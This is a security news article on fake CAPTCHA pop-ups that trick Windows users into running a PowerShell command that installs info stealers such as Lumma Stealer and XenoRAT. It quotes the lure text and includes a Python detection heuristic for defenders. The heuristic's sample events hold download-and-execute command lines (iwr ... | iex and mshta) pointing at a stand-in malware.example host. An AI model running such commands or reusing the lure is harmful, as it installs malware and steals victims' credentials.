Fake CAPTCHA malware tricks Windows users into installing info stealers

By now, many of us have become so familiar with CAPTCHA that it’s become second nature to prove we’re “not a robot” without batting an eyelid, whether it’s typing out an obscured text or ticking a box. But would you notice if the CAPTCHA requests went even further?

Apparently, many people don’t, considering the recent rise in threat actors exploiting CAPTCHA to trick Windows users into downloading malware like trojans and info stealers to their computers. A report from HP examining this trend in Q4 of 2024 blames “click tolerance,” which refers to how people have grown used to completing multiple authentication steps online.

The CAPTCHA ruse

The cyberattack begins with the victim being redirected to a site run by malicious actors and prompted to complete verification steps to prove they’re a human. Instead of the usual CAPTCHA, according to Malwarebytes, a pop-up window will appear, often saying something like this:

“To better prove you are not a robot, please:

  1. Press & hold the Windows Key + R.
  2. In the verification windows, press Ctrl + V.
  3. Press Enter on your keyboard to finish.

You will observe and agree:

“I’m not a robot – reCAPTCHA Verification ID: 8253”

Perform the steps above to finish verification.”

The final two lines are presented with a tick box and a “Verify” button. If the user completes the steps, they will unwittingly run a malicious PowerShell command and download malware. Often, it’s the Lumma Stealer remote access trojan (RAT). Other campaigns used XenoRAT and malicious JavaScript code inside Scalable Vector Graphics (SVG) images that would deploy several different types of malware to the victim’s computer.
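Because the Win+R / Ctrl+V / Enter sequence launches the pasted command from the Run dialog, the resulting process is a child of explorer.exe. The following is an added detection example, not code from the HP or Malwarebytes reports: it scans constructed process-creation events (Sysmon Event ID 1 style fields; the sample command lines and the malware.example host are made up) for a script host spawned by explorer.exe with hidden-window, encoded-command or download-and-execute flags.

```python
import re

# Constructed sample process-creation events, not real telemetry from the
# campaigns described above. Field names follow Sysmon Event ID 1.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'powershell -w hidden -c "iwr http://malware.example/x | iex"'},
    {"Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "mshta http://malware.example/verify.hta"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files\Vendor\agent.exe",
     "CommandLine": "powershell -File C:\\scripts\\inventory.ps1"},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "notepad.exe"},
]

# The Run dialog hands the pasted command to explorer.exe, so the child has
# explorer.exe as its parent. That alone is normal for any Win+R launch, so we
# also require a script host plus signs of hidden execution or remote fetching.
SCRIPT_HOSTS = ("powershell.exe", "pwsh.exe", "mshta.exe",
                "cmd.exe", "wscript.exe", "cscript.exe")
SUSPICIOUS = re.compile(
    r"(-w(indow(style)?)?\s+hidden|-e(nc(odedcommand)?)?\s|"
    r"\biwr\b|\birm\b|invoke-webrequest|invoke-expression|\biex\b|"
    r"downloadstring|https?://)",
    re.IGNORECASE,
)


def is_clickfix_like(event):
    """True when a script host spawned by explorer.exe carries suspicious flags."""
    parent_ok = event["ParentImage"].lower().endswith("\\explorer.exe")
    host_ok = event["Image"].lower().endswith(SCRIPT_HOSTS)
    return parent_ok and host_ok and bool(SUSPICIOUS.search(event["CommandLine"]))


def flag_events(events):
    """Return the command lines of all events matching the heuristic."""
    return [e["CommandLine"] for e in events if is_clickfix_like(e)]


if __name__ == "__main__":
    for cmd in flag_events(SAMPLE_EVENTS):
        print("ALERT possible fake-CAPTCHA execution:", cmd)
```

Only the two explorer.exe-spawned script hosts with download or hidden-window indicators are flagged; the agent-launched inventory script and the plain notepad launch are not.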

What the malware can do

Lumma stealer is a malware-as-a-service info stealer that targets various data, such as cryptocurrency wallets, user credentials, and two-factor authentication browser extensions. Meanwhile, XenoRAT has advanced surveillance capabilities, such as microphone and webcam capture, as well as the ability to control devices, exfiltrate data, and log keystrokes.

How to protect yourself

Vigilance is key. Mindlessly following instructions from a pop-up online is never a good idea, and that’s doubly so when they come from an unfamiliar website you’ve never visited before. Extra steps you can take include:

  • Installing a browser extension to block malicious domains and scam sites
  • Installing anti-malware software to prevent you from downloading malicious scripts
  • Disabling browser JavaScript when visiting unfamiliar sites